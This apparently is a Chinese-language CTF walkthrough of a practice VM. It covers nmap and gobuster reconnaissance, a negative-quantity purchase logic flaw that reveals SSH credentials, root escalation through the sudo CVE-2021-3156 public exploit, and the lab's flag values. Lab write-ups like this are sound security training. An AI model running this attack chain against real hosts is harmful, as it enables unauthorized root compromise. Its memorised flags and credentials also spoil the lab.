Mazesec_lanSSudoyy

靶机来源：QQ群-660930334

难度：Baby

思维导图：

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 12:22 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00078s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00064s latency).
MAC Address: 08:00:27:B1:CB:4A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.7
Host is up (0.00082s latency).
MAC Address: 08:00:27:95:CB:6F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.64 seconds

靶机IP：192.168.2.70

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.7                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 12:22 +0800
Nmap scan report for 192.168.2.7
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:95:CB:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.7 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 12:23 +0800
Nmap scan report for 192.168.2.7
Host is up (0.00053s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:95:CB:6F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.7                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 12:23 +0800
Nmap scan report for 192.168.2.7
Host is up (0.0045s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:95:CB:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.16 seconds

二、WEN渗透

1、80端口

访问80端口，没有什么信息

┌──(root㉿kali)-[~]
└─# curl http://192.168.2.7                                                                                                 
index

2、目录扫描

进行目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.7
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              bak,php,html,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 6]
index.php            (Status: 200) [Size: 927]
server-status        (Status: 403) [Size: 276]
Progress: 1323348 / 1323348 (100.00%)
===============================================================
Finished
===============================================================

找到index.php

访问发现是一个购买页面

三、逻辑漏洞

购买核心权限需要1000元，但我们只有100元，经过测试发现，购买的数量可以为负数，账户余额就会增加，最终成功获取到核心权限sublarge:SublargePass2026

成功获取sublarge权限

┌──(root㉿kali)-[~]
└─# ssh sublarge@192.168.2.7   
sublarge@lanSSudoyy:~$ id
uid=1000(sublarge) gid=1000(sublarge) groups=1000(sublarge)

四、权限提升

在/opt目录下面找到sudo-1.8.23

sublarge@lanSSudoyy:~$ ls -la /opt
total 12
drwxr-xr-x  3 root root 4096 Mar  6 01:01 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x 11 root root 4096 Mar  4 07:07 sudo-1.8.23

查看sudo的版本

sublarge@lanSSudoyy:~$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23

该版本存在一个严重的漏洞cve-2021-3156

CVE-2021-3156

直接下载POC即可

https://github.com/worawit/CVE-2021-3156

直接运行即可提权

sublarge@lanSSudoyy:/tmp/CVE-2021-3156-main$ python3 exploit_nss.py 
/bin/bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
# id
uid=0(root) gid=0(root) groups=0(root),1000(sublarge)

五、查看FLAG

# cat /root/root.txt /home/sublarge/user.txt
flag{root-fjskldjk;dajfsa;lfdsajkfl}
flag{user-fjsklfsdlkfjdklfkl;jfwieodjk;dajfsa;lfdsajkfl}